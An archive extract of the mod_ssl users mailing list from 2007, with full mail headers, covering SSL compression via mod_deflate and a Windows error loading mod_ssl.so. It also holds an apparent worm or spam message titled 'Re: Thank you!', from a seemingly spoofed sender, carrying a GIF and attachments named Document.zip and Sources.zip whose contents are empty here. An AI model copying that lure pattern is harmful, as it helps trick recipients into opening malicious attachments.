R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 12 20:13:01 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 366F514D88C; Mon, 12 Feb 2007 20:13:01 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from babylon.hostgo.com (babylon.hostgo.com [65.19.169.34])
	by master.modssl.org (Postfix) with ESMTP id 8E67A14D83E
	for ; Mon, 12 Feb 2007 20:12:58 +0100 (CET)
Received: from 133.red-81-47-1.staticip.rima-tde.net ([81.47.1.133] helo=192.168.0.2)
	by babylon.hostgo.com with esmtpsa (TLSv1:RC4-MD5:128)
	(Exim 4.63)
	(envelope-from )
	id 1HGgbA-00010y-8B
	for modssl-users@modssl.org; Mon, 12 Feb 2007 14:12:26 -0500
Subject: Compression in SSL
From: devel 
To: modssl-users@modssl.org
Content-Type: text/plain
Date: Mon, 12 Feb 2007 20:11:18 +0000
Message-Id: <1171311078.4690.7.camel@localhost.localdomain>
Mime-Version: 1.0
X-Mailer: Evolution 2.0.2 (2.0.2-27.rhel4.6) 
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - babylon.hostgo.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - pas-world.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: devel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

In mod_ssl I can not see any option to enable compression.
It's posible to enable compression in SSL or
mod_deflate made it before?

-- 
--
Devel in Precio http://www.pas-world.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb 13 09:37:39 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 90CCF14D88C; Tue, 13 Feb 2007 09:37:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.werum.de (mx1.werum.de [62.156.157.70])
	by master.modssl.org (Postfix) with ESMTP id 31D8014D833
	for ; Tue, 13 Feb 2007 09:37:38 +0100 (CET)
Received: by mx1.werum.de (Postfix, from userid 501)
	id 25CB531A90F; Tue, 13 Feb 2007 09:37:09 +0100 (CET)
X-Spam-Checker-Version: SpamAssassin 3.1.7 (2006-10-05) on mx1.werum.de
X-Spam-Level: 
X-Spam-Status: No, score=-4.1 required=3.0 tests=ALL_TRUSTED,AWL,BAYES_00 
	autolearn=ham version=3.1.7
Received: from werum815.werum.net (mailsmtp1.werum.net [172.20.104.15])
	by mx1.werum.de (Postfix) with ESMTP id ABEB231A906
	for ; Tue, 13 Feb 2007 09:37:08 +0100 (CET)
Received: from localhost (unknown [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id A2696932C9;
	Tue, 13 Feb 2007 09:37:06 +0100 (CET)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 15122-09; Tue, 13 Feb 2007 09:35:54 +0100 (CET)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id 12670932C8
	for ; Tue, 13 Feb 2007 09:37:06 +0100 (CET)
Message-ID: <45D1787B.3050907@werum.de>
Date: Tue, 13 Feb 2007 09:36:11 +0100
From: Eckard Wille 
User-Agent: Thunderbird 1.5.0.9 (Windows/20061207)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Compression in SSL
References: <1171311078.4690.7.camel@localhost.localdomain>
In-Reply-To: <1171311078.4690.7.camel@localhost.localdomain>
X-Enigmail-Version: 0.94.1.2
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

devel schrieb:
> In mod_ssl I can not see any option to enable compression.
> It's posible to enable compression in SSL or
> mod_deflate made it before?

Hi,

if you are using Apache 2 you should be fine with mod_deflate. Test
your site with the firefox plugin "LiveHttpHeaders"; the header info
"Content-Encoding=gzip" means your listener delivers compressed content.

If you are using Apache 1.3, follow the steps from the mini howto at
http://marc.theaimsgroup.com/?l=apache-modgzip&m=103056813417250&w=2.
In short terms, set up two vhosts: one hidden only compressing with
mod_gzip, the other public one with ssl which is proxying the content
from the first one.

Hope that helps,
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 15 14:15:25 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D5CA614D8B5; Thu, 15 Feb 2007 14:15:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.168])
	by master.modssl.org (Postfix) with ESMTP id 7280C14D82B
	for ; Thu, 15 Feb 2007 14:15:22 +0100 (CET)
Received: by ug-out-1314.google.com with SMTP id 80so225708ugb
        for ; Thu, 15 Feb 2007 05:14:52 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=svRvK6frWCIb1qYmTVuOSJu//KgA7Nx+kHEdw2WPXimfwPyxWerGVGf7sOgOR1JCk9BskEbAmLXeThvc+kA5yyu6fFt3jnQEQp6m8UU8pnUHR5rYnbIiJvJLgfvqSIfJ7fAHr+KqNz0g6671cM6rAz5NkEyARKj0VoctFUk9oc4=
Received: by 10.78.158.11 with SMTP id g11mr428213hue.1171545292535;
        Thu, 15 Feb 2007 05:14:52 -0800 (PST)
Received: by 10.78.81.2 with HTTP; Thu, 15 Feb 2007 05:14:52 -0800 (PST)
Message-ID: 
Date: Thu, 15 Feb 2007 13:14:52 +0000
From: "Andrew Madu" 
To: modssl-users@modssl.org
Subject: Cannot load mod_ssl.so into server: The operating system cannot run %1
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_104640_14055267.1171545292481"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrew Madu" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_104640_14055267.1171545292481
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Operating system: Windows XP Professional
Version: 2002
Service Pack: 2

Apache HTTP version: 2.2.4 (Binary)

Syntax error on line 114 of httpd.conf:
Cannot load mod_ssl.so into server: The operating system cannot run %1

Of course line 114 in my httpd.conf document is:
LoadModule ssl_module modules/mod_ssl.so

The mod_ssl.so module is situated in C:\Program Files\Apache Software
Foundation\Apache2.2\modules.

What is the issue here and how can I best resolve it?

--
Regards

Andrew

------=_Part_104640_14055267.1171545292481
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Operating system: Windows XP Professional
Version: 2002
Service Pack: 2

Apache HTTP version: 2.2.4 (Binary)

Syntax error on line 114 of httpd.conf:
Cannot load mod_ssl.so into server: The operating system cannot run %1


Of course line 114 in my httpd.conf document is:
LoadModule ssl_module modules/mod_ssl.so

The mod_ssl.so module is situated in C:\Program Files\Apache Software Foundation\Apache2.2\modules. 

What is the issue here and how can I best resolve it?


--
Regards

Andrew


------=_Part_104640_14055267.1171545292481--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 15 16:26:38 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B697414D8B5; Thu, 15 Feb 2007 16:26:38 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id F138D14D82B
	for ; Thu, 15 Feb 2007 16:26:35 +0100 (CET)
Date: Thu, 15 Feb 2007 10:39:12 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 15 17:04:52 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6B3DB14D8B5; Thu, 15 Feb 2007 17:04:52 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wr-out-0506.google.com (wr-out-0506.google.com [64.233.184.238])
	by master.modssl.org (Postfix) with ESMTP id 9F17714D82B
	for ; Thu, 15 Feb 2007 17:04:51 +0100 (CET)
Received: by wr-out-0506.google.com with SMTP id i4so803999wra
        for ; Thu, 15 Feb 2007 08:04:20 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=AffKdpdrMKeYnU/pktpLLUGCNUEgGirHVd1FmtNZ+qLWQPN0AIo0BV1wwRHL0WuMgklHN1w5kticZH9js0OTDwE4qw1jw4B0tJiSwXw/iedNDU4CLneUFtGWWaPBXXyJJs739pc26oWq13ZjDvD+PLPeh2wDIjaT6llV/+fT8zE=
Received: by 10.114.192.1 with SMTP id p1mr1113334waf.1171555459965;
        Thu, 15 Feb 2007 08:04:19 -0800 (PST)
Received: by 10.114.170.15 with HTTP; Thu, 15 Feb 2007 08:04:19 -0800 (PST)
Message-ID: <740f716a0702150804y12ce0c3fp407b8466d4da046c@mail.gmail.com>
Date: Thu, 15 Feb 2007 08:04:19 -0800
From: "Yvo van Doorn" 
To: modssl-users@modssl.org
Subject: Re: Cannot load mod_ssl.so into server: The operating system cannot run %1
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
